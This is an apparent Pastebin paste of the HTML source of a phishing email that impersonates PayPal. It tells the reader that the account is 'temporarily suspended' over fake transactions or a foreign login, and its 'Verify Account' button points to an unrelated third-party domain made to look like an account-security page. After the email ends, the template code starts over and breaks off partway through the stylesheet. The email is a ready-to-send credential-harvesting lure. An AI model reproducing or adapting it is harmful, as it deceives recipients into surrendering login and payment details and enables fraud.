Advertisement
Guest User

Untitled

a guest
Dec 7th, 2018
88
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 41.16 KB | None | 0 0
  1. <html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office"><head>
  2. <!-- NAME: 1:3 COLUMN -->
  3. <!--[if gte mso 15]>
  4. <xml>
  5. <o:OfficeDocumentSettings>
  6. <o:AllowPNG/>
  7. <o:PixelsPerInch>96</o:PixelsPerInch>
  8. </o:OfficeDocumentSettings>
  9. </xml>
  10. <![endif]-->
  11. <meta charset="UTF-8">
  12. <meta http-equiv="X-UA-Compatible" content="IE=edge">
  13. <meta name="viewport" content="width=device-width, initial-scale=1">
  14. <title></title>
  15.  
  16. <style type="text/css">
  17. p{
  18. margin:10px 0;
  19. padding:0;
  20. }
  21. table{
  22. border-collapse:collapse;
  23. }
  24. h1,h2,h3,h4,h5,h6{
  25. display:block;
  26. margin:0;
  27. padding:0;
  28. }
  29. img,a img{
  30. border:0;
  31. height:auto;
  32. outline:none;
  33. text-decoration:none;
  34. }
  35. body,#bodyTable,#bodyCell{
  36. height:100%;
  37. margin:0;
  38. padding:0;
  39. width:100%;
  40. }
  41. .mcnPreviewText{
  42. display:none !important;
  43. }
  44. #outlook a{
  45. padding:0;
  46. }
  47. img{
  48. -ms-interpolation-mode:bicubic;
  49. }
  50. table{
  51. mso-table-lspace:0pt;
  52. mso-table-rspace:0pt;
  53. }
  54. .ReadMsgBody{
  55. width:100%;
  56. }
  57. .ExternalClass{
  58. width:100%;
  59. }
  60. p,a,li,td,blockquote{
  61. mso-line-height-rule:exactly;
  62. }
  63. a[href^=tel],a[href^=sms]{
  64. color:inherit;
  65. cursor:default;
  66. text-decoration:none;
  67. }
  68. p,a,li,td,body,table,blockquote{
  69. -ms-text-size-adjust:100%;
  70. -webkit-text-size-adjust:100%;
  71. }
  72. .ExternalClass,.ExternalClass p,.ExternalClass td,.ExternalClass div,.ExternalClass span,.ExternalClass font{
  73. line-height:100%;
  74. }
  75. a[x-apple-data-detectors]{
  76. color:inherit !important;
  77. text-decoration:none !important;
  78. font-size:inherit !important;
  79. font-family:inherit !important;
  80. font-weight:inherit !important;
  81. line-height:inherit !important;
  82. }
  83. #bodyCell{
  84. padding:10px;
  85. }
  86. .templateContainer{
  87. max-width:600px !important;
  88. }
  89. a.mcnButton{
  90. display:block;
  91. }
  92. .mcnImage{
  93. vertical-align:bottom;
  94. }
  95. .mcnTextContent{
  96. word-break:break-word;
  97. }
  98. .mcnTextContent img{
  99. height:auto !important;
  100. }
  101. .mcnDividerBlock{
  102. table-layout:fixed !important;
  103. }
  104. /*
  105. @tab Page
  106. @section Background Style
  107. @tip Set the background color and top border for your email. You may want to choose colors that match your company's branding.
  108. */
  109. body,#bodyTable{
  110. /*@editable*/background-color:#FAFAFA;
  111. }
  112. /*
  113. @tab Page
  114. @section Background Style
  115. @tip Set the background color and top border for your email. You may want to choose colors that match your company's branding.
  116. */
  117. #bodyCell{
  118. /*@editable*/border-top:0;
  119. }
  120. /*
  121. @tab Page
  122. @section Email Border
  123. @tip Set the border for your email.
  124. */
  125. .templateContainer{
  126. /*@editable*/border:0;
  127. }
  128. /*
  129. @tab Page
  130. @section Heading 1
  131. @tip Set the styling for all first-level headings in your emails. These should be the largest of your headings.
  132. @style heading 1
  133. */
  134. h1{
  135. /*@editable*/color:#202020;
  136. /*@editable*/font-family:Helvetica;
  137. /*@editable*/font-size:26px;
  138. /*@editable*/font-style:normal;
  139. /*@editable*/font-weight:bold;
  140. /*@editable*/line-height:125%;
  141. /*@editable*/letter-spacing:normal;
  142. /*@editable*/text-align:left;
  143. }
  144. /*
  145. @tab Page
  146. @section Heading 2
  147. @tip Set the styling for all second-level headings in your emails.
  148. @style heading 2
  149. */
  150. h2{
  151. /*@editable*/color:#202020;
  152. /*@editable*/font-family:Helvetica;
  153. /*@editable*/font-size:22px;
  154. /*@editable*/font-style:normal;
  155. /*@editable*/font-weight:bold;
  156. /*@editable*/line-height:125%;
  157. /*@editable*/letter-spacing:normal;
  158. /*@editable*/text-align:left;
  159. }
  160. /*
  161. @tab Page
  162. @section Heading 3
  163. @tip Set the styling for all third-level headings in your emails.
  164. @style heading 3
  165. */
  166. h3{
  167. /*@editable*/color:#202020;
  168. /*@editable*/font-family:Helvetica;
  169. /*@editable*/font-size:20px;
  170. /*@editable*/font-style:normal;
  171. /*@editable*/font-weight:bold;
  172. /*@editable*/line-height:125%;
  173. /*@editable*/letter-spacing:normal;
  174. /*@editable*/text-align:left;
  175. }
  176. /*
  177. @tab Page
  178. @section Heading 4
  179. @tip Set the styling for all fourth-level headings in your emails. These should be the smallest of your headings.
  180. @style heading 4
  181. */
  182. h4{
  183. /*@editable*/color:#202020;
  184. /*@editable*/font-family:Helvetica;
  185. /*@editable*/font-size:18px;
  186. /*@editable*/font-style:normal;
  187. /*@editable*/font-weight:bold;
  188. /*@editable*/line-height:125%;
  189. /*@editable*/letter-spacing:normal;
  190. /*@editable*/text-align:left;
  191. }
  192. /*
  193. @tab Preheader
  194. @section Preheader Style
  195. @tip Set the background color and borders for your email's preheader area.
  196. */
  197. #templatePreheader{
  198. /*@editable*/background-color:#FAFAFA;
  199. /*@editable*/background-image:none;
  200. /*@editable*/background-repeat:no-repeat;
  201. /*@editable*/background-position:center;
  202. /*@editable*/background-size:cover;
  203. /*@editable*/border-top:0;
  204. /*@editable*/border-bottom:0;
  205. /*@editable*/padding-top:9px;
  206. /*@editable*/padding-bottom:9px;
  207. }
  208. /*
  209. @tab Preheader
  210. @section Preheader Text
  211. @tip Set the styling for your email's preheader text. Choose a size and color that is easy to read.
  212. */
  213. #templatePreheader .mcnTextContent,#templatePreheader .mcnTextContent p{
  214. /*@editable*/color:#656565;
  215. /*@editable*/font-family:Helvetica;
  216. /*@editable*/font-size:12px;
  217. /*@editable*/line-height:150%;
  218. /*@editable*/text-align:left;
  219. }
  220. /*
  221. @tab Preheader
  222. @section Preheader Link
  223. @tip Set the styling for your email's preheader links. Choose a color that helps them stand out from your text.
  224. */
  225. #templatePreheader .mcnTextContent a,#templatePreheader .mcnTextContent p a{
  226. /*@editable*/color:#656565;
  227. /*@editable*/font-weight:normal;
  228. /*@editable*/text-decoration:underline;
  229. }
  230. /*
  231. @tab Header
  232. @section Header Style
  233. @tip Set the background color and borders for your email's header area.
  234. */
  235. #templateHeader{
  236. /*@editable*/background-color:#FFFFFF;
  237. /*@editable*/background-image:none;
  238. /*@editable*/background-repeat:no-repeat;
  239. /*@editable*/background-position:center;
  240. /*@editable*/background-size:cover;
  241. /*@editable*/border-top:0;
  242. /*@editable*/border-bottom:0;
  243. /*@editable*/padding-top:9px;
  244. /*@editable*/padding-bottom:0;
  245. }
  246. /*
  247. @tab Header
  248. @section Header Text
  249. @tip Set the styling for your email's header text. Choose a size and color that is easy to read.
  250. */
  251. #templateHeader .mcnTextContent,#templateHeader .mcnTextContent p{
  252. /*@editable*/color:#202020;
  253. /*@editable*/font-family:Helvetica;
  254. /*@editable*/font-size:16px;
  255. /*@editable*/line-height:150%;
  256. /*@editable*/text-align:left;
  257. }
  258. /*
  259. @tab Header
  260. @section Header Link
  261. @tip Set the styling for your email's header links. Choose a color that helps them stand out from your text.
  262. */
  263. #templateHeader .mcnTextContent a,#templateHeader .mcnTextContent p a{
  264. /*@editable*/color:#2BAADF;
  265. /*@editable*/font-weight:normal;
  266. /*@editable*/text-decoration:underline;
  267. }
  268. /*
  269. @tab Body
  270. @section Body Style
  271. @tip Set the background color and borders for your email's body area.
  272. */
  273. #templateBody{
  274. /*@editable*/background-color:#FFFFFF;
  275. /*@editable*/background-image:none;
  276. /*@editable*/background-repeat:no-repeat;
  277. /*@editable*/background-position:center;
  278. /*@editable*/background-size:cover;
  279. /*@editable*/border-top:0;
  280. /*@editable*/border-bottom:0;
  281. /*@editable*/padding-top:0;
  282. /*@editable*/padding-bottom:0;
  283. }
  284. /*
  285. @tab Body
  286. @section Body Text
  287. @tip Set the styling for your email's body text. Choose a size and color that is easy to read.
  288. */
  289. #templateBody .mcnTextContent,#templateBody .mcnTextContent p{
  290. /*@editable*/color:#202020;
  291. /*@editable*/font-family:Helvetica;
  292. /*@editable*/font-size:16px;
  293. /*@editable*/line-height:150%;
  294. /*@editable*/text-align:left;
  295. }
  296. /*
  297. @tab Body
  298. @section Body Link
  299. @tip Set the styling for your email's body links. Choose a color that helps them stand out from your text.
  300. */
  301. #templateBody .mcnTextContent a,#templateBody .mcnTextContent p a{
  302. /*@editable*/color:#2BAADF;
  303. /*@editable*/font-weight:normal;
  304. /*@editable*/text-decoration:underline;
  305. }
  306. /*
  307. @tab Columns
  308. @section Column Style
  309. @tip Set the background color and borders for your email's columns.
  310. */
  311. #templateColumns{
  312. /*@editable*/background-color:#FFFFFF;
  313. /*@editable*/background-image:none;
  314. /*@editable*/background-repeat:no-repeat;
  315. /*@editable*/background-position:center;
  316. /*@editable*/background-size:cover;
  317. /*@editable*/border-top:0;
  318. /*@editable*/border-bottom:2px solid #EAEAEA;
  319. /*@editable*/padding-top:0;
  320. /*@editable*/padding-bottom:9px;
  321. }
  322. /*
  323. @tab Columns
  324. @section Column Text
  325. @tip Set the styling for your email's column text. Choose a size and color that is easy to read.
  326. */
  327. #templateColumns .columnContainer .mcnTextContent,#templateColumns .columnContainer .mcnTextContent p{
  328. /*@editable*/color:#202020;
  329. /*@editable*/font-family:Helvetica;
  330. /*@editable*/font-size:16px;
  331. /*@editable*/line-height:150%;
  332. /*@editable*/text-align:left;
  333. }
  334. /*
  335. @tab Columns
  336. @section Column Link
  337. @tip Set the styling for your email's column links. Choose a color that helps them stand out from your text.
  338. */
  339. #templateColumns .columnContainer .mcnTextContent a,#templateColumns .columnContainer .mcnTextContent p a{
  340. /*@editable*/color:#2BAADF;
  341. /*@editable*/font-weight:normal;
  342. /*@editable*/text-decoration:underline;
  343. }
  344. /*
  345. @tab Footer
  346. @section Footer Style
  347. @tip Set the background color and borders for your email's footer area.
  348. */
  349. #templateFooter{
  350. /*@editable*/background-color:#FAFAFA;
  351. /*@editable*/background-image:none;
  352. /*@editable*/background-repeat:no-repeat;
  353. /*@editable*/background-position:center;
  354. /*@editable*/background-size:cover;
  355. /*@editable*/border-top:0;
  356. /*@editable*/border-bottom:0;
  357. /*@editable*/padding-top:9px;
  358. /*@editable*/padding-bottom:9px;
  359. }
  360. /*
  361. @tab Footer
  362. @section Footer Text
  363. @tip Set the styling for your email's footer text. Choose a size and color that is easy to read.
  364. */
  365. #templateFooter .mcnTextContent,#templateFooter .mcnTextContent p{
  366. /*@editable*/color:#656565;
  367. /*@editable*/font-family:Helvetica;
  368. /*@editable*/font-size:12px;
  369. /*@editable*/line-height:150%;
  370. /*@editable*/text-align:center;
  371. }
  372. /*
  373. @tab Footer
  374. @section Footer Link
  375. @tip Set the styling for your email's footer links. Choose a color that helps them stand out from your text.
  376. */
  377. #templateFooter .mcnTextContent a,#templateFooter .mcnTextContent p a{
  378. /*@editable*/color:#656565;
  379. /*@editable*/font-weight:normal;
  380. /*@editable*/text-decoration:underline;
  381. }
  382. @media only screen and (min-width:768px){
  383. .templateContainer{
  384. width:600px !important;
  385. }
  386.  
  387. } @media only screen and (max-width: 480px){
  388. body,table,td,p,a,li,blockquote{
  389. -webkit-text-size-adjust:none !important;
  390. }
  391.  
  392. } @media only screen and (max-width: 480px){
  393. body{
  394. width:100% !important;
  395. min-width:100% !important;
  396. }
  397.  
  398. } @media only screen and (max-width: 480px){
  399. #bodyCell{
  400. padding-top:10px !important;
  401. }
  402.  
  403. } @media only screen and (max-width: 480px){
  404. .columnWrapper{
  405. max-width:100% !important;
  406. width:100% !important;
  407. }
  408.  
  409. } @media only screen and (max-width: 480px){
  410. .mcnImage{
  411. width:100% !important;
  412. }
  413.  
  414. } @media only screen and (max-width: 480px){
  415. .mcnCartContainer,.mcnCaptionTopContent,.mcnRecContentContainer,.mcnCaptionBottomContent,.mcnTextContentContainer,.mcnBoxedTextContentContainer,.mcnImageGroupContentContainer,.mcnCaptionLeftTextContentContainer,.mcnCaptionRightTextContentContainer,.mcnCaptionLeftImageContentContainer,.mcnCaptionRightImageContentContainer,.mcnImageCardLeftTextContentContainer,.mcnImageCardRightTextContentContainer{
  416. max-width:100% !important;
  417. width:100% !important;
  418. }
  419.  
  420. } @media only screen and (max-width: 480px){
  421. .mcnBoxedTextContentContainer{
  422. min-width:100% !important;
  423. }
  424.  
  425. } @media only screen and (max-width: 480px){
  426. .mcnImageGroupContent{
  427. padding:9px !important;
  428. }
  429.  
  430. } @media only screen and (max-width: 480px){
  431. .mcnCaptionLeftContentOuter .mcnTextContent,.mcnCaptionRightContentOuter .mcnTextContent{
  432. padding-top:9px !important;
  433. }
  434.  
  435. } @media only screen and (max-width: 480px){
  436. .mcnImageCardTopImageContent,.mcnCaptionBlockInner .mcnCaptionTopContent:last-child .mcnTextContent{
  437. padding-top:18px !important;
  438. }
  439.  
  440. } @media only screen and (max-width: 480px){
  441. .mcnImageCardBottomImageContent{
  442. padding-bottom:9px !important;
  443. }
  444.  
  445. } @media only screen and (max-width: 480px){
  446. .mcnImageGroupBlockInner{
  447. padding-top:0 !important;
  448. padding-bottom:0 !important;
  449. }
  450.  
  451. } @media only screen and (max-width: 480px){
  452. .mcnImageGroupBlockOuter{
  453. padding-top:9px !important;
  454. padding-bottom:9px !important;
  455. }
  456.  
  457. } @media only screen and (max-width: 480px){
  458. .mcnTextContent,.mcnBoxedTextContentColumn{
  459. padding-right:18px !important;
  460. padding-left:18px !important;
  461. }
  462.  
  463. } @media only screen and (max-width: 480px){
  464. .mcnImageCardLeftImageContent,.mcnImageCardRightImageContent{
  465. padding-right:18px !important;
  466. padding-bottom:0 !important;
  467. padding-left:18px !important;
  468. }
  469.  
  470. } @media only screen and (max-width: 480px){
  471. .mcpreview-image-uploader{
  472. display:none !important;
  473. width:100% !important;
  474. }
  475.  
  476. } @media only screen and (max-width: 480px){
  477. /*
  478. @tab Mobile Styles
  479. @section Heading 1
  480. @tip Make the first-level headings larger in size for better readability on small screens.
  481. */
  482. h1{
  483. /*@editable*/font-size:22px !important;
  484. /*@editable*/line-height:125% !important;
  485. }
  486.  
  487. } @media only screen and (max-width: 480px){
  488. /*
  489. @tab Mobile Styles
  490. @section Heading 2
  491. @tip Make the second-level headings larger in size for better readability on small screens.
  492. */
  493. h2{
  494. /*@editable*/font-size:20px !important;
  495. /*@editable*/line-height:125% !important;
  496. }
  497.  
  498. } @media only screen and (max-width: 480px){
  499. /*
  500. @tab Mobile Styles
  501. @section Heading 3
  502. @tip Make the third-level headings larger in size for better readability on small screens.
  503. */
  504. h3{
  505. /*@editable*/font-size:18px !important;
  506. /*@editable*/line-height:125% !important;
  507. }
  508.  
  509. } @media only screen and (max-width: 480px){
  510. /*
  511. @tab Mobile Styles
  512. @section Heading 4
  513. @tip Make the fourth-level headings larger in size for better readability on small screens.
  514. */
  515. h4{
  516. /*@editable*/font-size:16px !important;
  517. /*@editable*/line-height:150% !important;
  518. }
  519.  
  520. } @media only screen and (max-width: 480px){
  521. /*
  522. @tab Mobile Styles
  523. @section Boxed Text
  524. @tip Make the boxed text larger in size for better readability on small screens. We recommend a font size of at least 16px.
  525. */
  526. .mcnBoxedTextContentContainer .mcnTextContent,.mcnBoxedTextContentContainer .mcnTextContent p{
  527. /*@editable*/font-size:14px !important;
  528. /*@editable*/line-height:150% !important;
  529. }
  530.  
  531. } @media only screen and (max-width: 480px){
  532. /*
  533. @tab Mobile Styles
  534. @section Preheader Visibility
  535. @tip Set the visibility of the email's preheader on small screens. You can hide it to save space.
  536. */
  537. #templatePreheader{
  538. /*@editable*/display:block !important;
  539. }
  540.  
  541. } @media only screen and (max-width: 480px){
  542. /*
  543. @tab Mobile Styles
  544. @section Preheader Text
  545. @tip Make the preheader text larger in size for better readability on small screens.
  546. */
  547. #templatePreheader .mcnTextContent,#templatePreheader .mcnTextContent p{
  548. /*@editable*/font-size:14px !important;
  549. /*@editable*/line-height:150% !important;
  550. }
  551.  
  552. } @media only screen and (max-width: 480px){
  553. /*
  554. @tab Mobile Styles
  555. @section Header Text
  556. @tip Make the header text larger in size for better readability on small screens.
  557. */
  558. #templateHeader .mcnTextContent,#templateHeader .mcnTextContent p{
  559. /*@editable*/font-size:16px !important;
  560. /*@editable*/line-height:150% !important;
  561. }
  562.  
  563. } @media only screen and (max-width: 480px){
  564. /*
  565. @tab Mobile Styles
  566. @section Body Text
  567. @tip Make the body text larger in size for better readability on small screens. We recommend a font size of at least 16px.
  568. */
  569. #templateBody .mcnTextContent,#templateBody .mcnTextContent p{
  570. /*@editable*/font-size:16px !important;
  571. /*@editable*/line-height:150% !important;
  572. }
  573.  
  574. } @media only screen and (max-width: 480px){
  575. /*
  576. @tab Mobile Styles
  577. @section Column Text
  578. @tip Make the column text larger in size for better readability on small screens. We recommend a font size of at least 16px.
  579. */
  580. #templateColumns .columnContainer .mcnTextContent,#templateColumns .columnContainer .mcnTextContent p{
  581. /*@editable*/font-size:16px !important;
  582. /*@editable*/line-height:150% !important;
  583. }
  584.  
  585. } @media only screen and (max-width: 480px){
  586. /*
  587. @tab Mobile Styles
  588. @section Footer Text
  589. @tip Make the footer content text larger in size for better readability on small screens.
  590. */
  591. #templateFooter .mcnTextContent,#templateFooter .mcnTextContent p{
  592. /*@editable*/font-size:14px !important;
  593. /*@editable*/line-height:150% !important;
  594. }
  595.  
  596. }</style></head>
  597. <body>
  598. <!--*|IF:MC_PREVIEW_TEXT|*-->
  599. <!--[if !gte mso 9]><!----><span class="mcnPreviewText" style="display:none; font-size:0px; line-height:0px; max-height:0px; max-width:0px; opacity:0; overflow:hidden; visibility:hidden; mso-hide:all;">Dear Customer Please note that your account has been temporarily suspended</span><!--<![endif]-->
  600. <!--*|END:IF|*-->
  601. <center>
  602. <table align="center" border="0" cellpadding="0" cellspacing="0" height="100%" width="100%" id="bodyTable">
  603. <tbody><tr>
  604. <td align="center" valign="top" id="bodyCell">
  605. <!-- BEGIN TEMPLATE // -->
  606. <!--[if gte mso 9]>
  607. <table align="center" border="0" cellspacing="0" cellpadding="0" width="600" style="width:600px;">
  608. <tr>
  609. <td align="center" valign="top" width="600" style="width:600px;">
  610. <![endif]-->
  611. <table border="0" cellpadding="0" cellspacing="0" width="100%" class="templateContainer">
  612. <tbody><tr>
  613. <td valign="top" id="templatePreheader"><table class="mcnTextBlock" style="min-width:100%;" width="100%" cellspacing="0" cellpadding="0" border="0">
  614. <tbody class="mcnTextBlockOuter">
  615. <tr>
  616. <td class="mcnTextBlockInner" style="padding-top:9px;" valign="top">
  617. <!--[if mso]>
  618. <table align="left" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:100%;">
  619. <tr>
  620. <![endif]-->
  621.  
  622. <!--[if mso]>
  623. <td valign="top" width="600" style="width:600px;">
  624. <![endif]-->
  625. <table style="max-width:100%; min-width:100%;" class="mcnTextContentContainer" width="100%" cellspacing="0" cellpadding="0" border="0" align="left">
  626. <tbody><tr>
  627.  
  628. <td class="mcnTextContent" style="padding-top:0; padding-right:18px; padding-bottom:9px; padding-left:18px;" valign="top">
  629.  
  630. <span style="color:#000000"><span style="font-size:17px">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; Account Notifications</span></span>
  631. </td>
  632. </tr>
  633. </tbody></table>
  634. <!--[if mso]>
  635. </td>
  636. <![endif]-->
  637.  
  638. <!--[if mso]>
  639. </tr>
  640. </table>
  641. <![endif]-->
  642. </td>
  643. </tr>
  644. </tbody>
  645. </table></td>
  646. </tr>
  647. <tr>
  648. <td valign="top" id="templateHeader"><table class="mcnTextBlock" style="min-width:100%;" width="100%" cellspacing="0" cellpadding="0" border="0">
  649. <tbody class="mcnTextBlockOuter">
  650. <tr>
  651. <td class="mcnTextBlockInner" style="padding-top:9px;" valign="top">
  652. <!--[if mso]>
  653. <table align="left" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:100%;">
  654. <tr>
  655. <![endif]-->
  656.  
  657. <!--[if mso]>
  658. <td valign="top" width="600" style="width:600px;">
  659. <![endif]-->
  660. <table style="max-width:100%; min-width:100%;" class="mcnTextContentContainer" width="100%" cellspacing="0" cellpadding="0" border="0" align="left">
  661. <tbody><tr>
  662.  
  663. <td class="mcnTextContent" style="padding-top:0; padding-right:18px; padding-bottom:9px; padding-left:18px;" valign="top">
  664.  
  665. <h1><span style="color:#002c84">Pay</span><span style="color:#009ede">pal</span></h1>
  666.  
  667. <p><span style="font-size:14px"><span style="font-family:verdana,geneva,sans-serif">Dear Customer Please note that your account has been temporarily suspended due to incomplete registration of account data Please enter our website through the button below and fill in the information. Why Your Account Locked?</span></span></p>
  668.  
  669. <ul>
  670. <li><span style="font-size:14px"><span style="font-family:verdana,geneva,sans-serif">Fake Transaction</span></span></li>
  671. <li><span style="font-size:14px"><span style="font-family:verdana,geneva,sans-serif">Fake Payement</span></span></li>
  672. <li><span style="font-size:14px"><span style="font-family:verdana,geneva,sans-serif">Login From Another Country</span></span></li>
  673. </ul>
  674.  
  675. </td>
  676. </tr>
  677. </tbody></table>
  678. <!--[if mso]>
  679. </td>
  680. <![endif]-->
  681.  
  682. <!--[if mso]>
  683. </tr>
  684. </table>
  685. <![endif]-->
  686. </td>
  687. </tr>
  688. </tbody>
  689. </table></td>
  690. </tr>
  691. <tr>
  692. <td valign="top" id="templateBody"><table class="mcnButtonBlock" style="min-width:100%;" width="100%" cellspacing="0" cellpadding="0" border="0">
  693. <tbody class="mcnButtonBlockOuter">
  694. <tr>
  695. <td style="padding-top:0; padding-right:18px; padding-bottom:18px; padding-left:18px;" class="mcnButtonBlockInner" valign="top" align="center">
  696. <table class="mcnButtonContentContainer" style="border-collapse: separate !important;border-radius: 9px;background-color: #2BAADF;" width="100%" cellspacing="0" cellpadding="0" border="0">
  697. <tbody>
  698. <tr>
  699. <td class="mcnButtonContent" style="font-family: Arial; font-size: 16px; padding: 15px;" valign="middle" align="center">
  700. <a class="mcnButton " title=" Verify Account" href="https://suffolkhouse.com.my/about/updating/account/security/V5/" target="_blank" style="font-weight: bold;letter-spacing: normal;line-height: 100%;text-align: center;text-decoration: none;color: #FFFFFF;"> Verify Account</a>
  701. </td>
  702. </tr>
  703. </tbody>
  704. </table>
  705. </td>
  706. </tr>
  707. </tbody>
  708. </table></td>
  709. </tr>
  710. <tr>
  711. <td valign="top" id="templateColumns">
  712. <!--[if gte mso 9]>
  713. <table align="center" border="0" cellspacing="0" cellpadding="0" width="600" style="width:600px;">
  714. <tr>
  715. <td align="center" valign="top" width="200" style="width:200px;">
  716. <![endif]-->
  717. <table align="left" border="0" cellpadding="0" cellspacing="0" width="200" class="columnWrapper">
  718. <tbody><tr>
  719. <td valign="top" class="columnContainer"></td>
  720. </tr>
  721. </tbody></table>
  722. <!--[if gte mso 9]>
  723. </td>
  724. <td align="center" valign="top" width="200" style="width:200px;">
  725. <![endif]-->
  726. <table align="left" border="0" cellpadding="0" cellspacing="0" width="200" class="columnWrapper">
  727. <tbody><tr>
  728. <td valign="top" class="columnContainer"></td>
  729. </tr>
  730. </tbody></table>
  731. <!--[if gte mso 9]>
  732. </td>
  733. <td align="center" valign="top" width="200" style="width:200px;">
  734. <![endif]-->
  735. <table align="left" border="0" cellpadding="0" cellspacing="0" width="200" class="columnWrapper">
  736. <tbody><tr>
  737. <td valign="top" class="columnContainer"></td>
  738. </tr>
  739. </tbody></table>
  740. <!--[if gte mso 9]>
  741. </td>
  742. </tr>
  743. </table>
  744. <![endif]-->
  745. </td>
  746. </tr>
  747. <tr>
  748. <td valign="top" id="templateFooter"></td>
  749. </tr>
  750. </tbody></table>
  751. <!--[if gte mso 9]>
  752. </td>
  753. </tr>
  754. </table>
  755. <![endif]-->
  756. <!-- // END TEMPLATE -->
  757. </td>
  758. </tr>
  759. </tbody></table>
  760. </center>
  761.  
  762.  
  763. </body></html><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office"><head>
  764. <!-- NAME: 1:3 COLUMN -->
  765. <!--[if gte mso 15]>
  766. <xml>
  767. <o:OfficeDocumentSettings>
  768. <o:AllowPNG/>
  769. <o:PixelsPerInch>96</o:PixelsPerInch>
  770. </o:OfficeDocumentSettings>
  771. </xml>
  772. <![endif]-->
  773. <meta charset="UTF-8">
  774. <meta http-equiv="X-UA-Compatible" content="IE=edge">
  775. <meta name="viewport" content="width=device-width, initial-scale=1">
  776. <title></title>
  777.  
  778. <style type="text/css">
  779. p{
  780. margin:10px 0;
  781. padding:0;
  782. }
  783. table{
  784. border-collapse:collapse;
  785. }
  786. h1,h2,h3,h4,h5,h6{
  787. display:block;
  788. margin:0;
  789. padding:0;
  790. }
  791. img,a img{
  792. border:0;
  793. height:auto;
  794. outline:none;
  795. text-decoration:none;
  796. }
  797. body,#bodyTable,#bodyCell{
  798. height:100%;
  799. margin:0;
  800. padding:0;
  801. width:100%;
  802. }
  803. .mcnPreviewText{
  804. display:none !important;
  805. }
  806. #outlook a{
  807. padding:0;
  808. }
  809. img{
  810. -ms-interpolation-mode:bicubic;
  811. }
  812. table{
  813. mso-table-lspace:0pt;
  814. mso-table-rspace:0pt;
  815. }
  816. .ReadMsgBody{
  817. width:100%;
  818. }
  819. .ExternalClass{
  820. width:100%;
  821. }
  822. p,a,li,td,blockquote{
  823. mso-line-height-rule:exactly;
  824. }
  825. a[href^=tel],a[href^=sms]{
  826. color:inherit;
  827. cursor:default;
  828. text-decoration:none;
  829. }
  830. p,a,li,td,body,table,blockquote{
  831. -ms-text-size-adjust:100%;
  832. -webkit-text-size-adjust:100%;
  833. }
  834. .ExternalClass,.ExternalClass p,.ExternalClass td,.ExternalClass div,.ExternalClass span,.ExternalClass font{
  835. line-height:100%;
  836. }
  837. a[x-apple-data-detectors]{
  838. color:inherit !important;
  839. text-decoration:none !important;
  840. font-size:inherit !important;
  841. font-family:inherit !important;
  842. font-weight:inherit !important;
  843. line-height:inherit !important;
  844. }
  845. #bodyCell{
  846. padding:10px;
  847. }
  848. .templateContainer{
  849. max-width:600px !important;
  850. }
  851. a.mcnButton{
  852. display:block;
  853. }
  854. .mcnImage{
  855. vertical-align:bottom;
  856. }
  857. .mcnTextContent{
  858. word-break:break-word;
  859. }
  860. .mcnTextContent img{
  861. height:auto !important;
  862. }
  863. .mcnDividerBlock{
  864. table-layout:fixed !important;
  865. }
  866. /*
  867. @tab Page
  868. @section Background Style
  869. @tip Set the background color and top border for your email. You may want to choose colors that match your company's branding.
  870. */
  871. body,#bodyTable{
  872. /*@editable*/background-color:#FAFAFA;
  873. }
  874. /*
  875. @tab Page
  876. @section Background Style
  877. @tip Set the background color and top border for your email. You may want to choose colors that match your company's branding.
  878. */
  879. #bodyCell{
  880. /*@editable*/border-top:0;
  881. }
  882. /*
  883. @tab Page
  884. @section Email Border
  885. @tip Set the border for your email.
  886. */
  887. .templateContainer{
  888. /*@editable*/border:0;
  889. }
  890. /*
  891. @tab Page
  892. @section Heading 1
  893. @tip Set the styling for all first-level headings in your emails. These should be the largest of your headings.
  894. @style heading 1
  895. */
  896. h1{
  897. /*@editable*/color:#202020;
  898. /*@editable*/font-family:Helvetica;
  899. /*@editable*/font-size:26px;
  900. /*@editable*/font-style:normal;
  901. /*@editable*/font-weight:bold;
  902. /*@editable*/line-height:125%;
  903. /*@editable*/letter-spacing:normal;
  904. /*@editable*/text-align:left;
  905. }
  906. /*
  907. @tab Page
  908. @section Heading 2
  909. @tip Set the styling for all second-level headings in your emails.
  910. @style heading 2
  911. */
  912. h2{
  913. /*@editable*/color:#202020;
  914. /*@editable*/font-family:Helvetica;
  915. /*@editable*/font-size:22px;
  916. /*@editable*/font-style:normal;
  917. /*@editable*/font-weight:bold;
  918. /*@editable*/line-height:125%;
  919. /*@editable*/letter-spacing:normal;
  920. /*@editable*/text-align:left;
  921. }
  922. /*
  923. @tab Page
  924. @section Heading 3
  925. @tip Set the styling for all third-level headings in your emails.
  926. @style heading 3
  927. */
  928. h3{
  929. /*@editable*/color:#202020;
  930. /*@editable*/font-family:Helvetica;
  931. /*@editable*/font-size:20px;
  932. /*@editable*/font-style:normal;
  933. /*@editable*/font-weight:bold;
  934. /*@editable*/line-height:125%;
  935. /*@editable*/letter-spacing:normal;
  936. /*@editable*/text-align:left;
  937. }
  938. /*
  939. @tab Page
  940. @section Heading 4
  941. @tip Set the styling for all fourth-level headings in your emails. These should be the smallest of your headings.
  942. @style heading 4
  943. */
  944. h4{
  945. /*@editable*/color:#202020;
  946. /*@editable*/font-family:Helvetica;
  947. /*@editable*/font-size:18px;
  948. /*@editable*/font-style:normal;
  949. /*@editable*/font-weight:bold;
  950. /*@editable*/line-height:125%;
  951. /*@editable*/letter-spacing:normal;
  952. /*@editable*/text-align:left;
  953. }
  954. /*
  955. @tab Preheader
  956. @section Preheader Style
  957. @tip Set the background color and borders for your email's preheader area.
  958. */
  959. #templatePreheader{
  960. /*@editable*/background-color:#FAFAFA;
  961. /*@editable*/background-image:none;
  962. /*@editable*/background-repeat:no-repeat;
  963. /*@editable*/background-position:center;
  964. /*@editable*/background-size:cover;
  965. /*@editable*/border-top:0;
  966. /*@editable*/border-bottom:0;
  967. /*@editable*/padding-top:9px;
  968. /*@editable*/padding-bottom:9px;
  969. }
  970. /*
  971. @tab Preheader
  972. @section Preheader Text
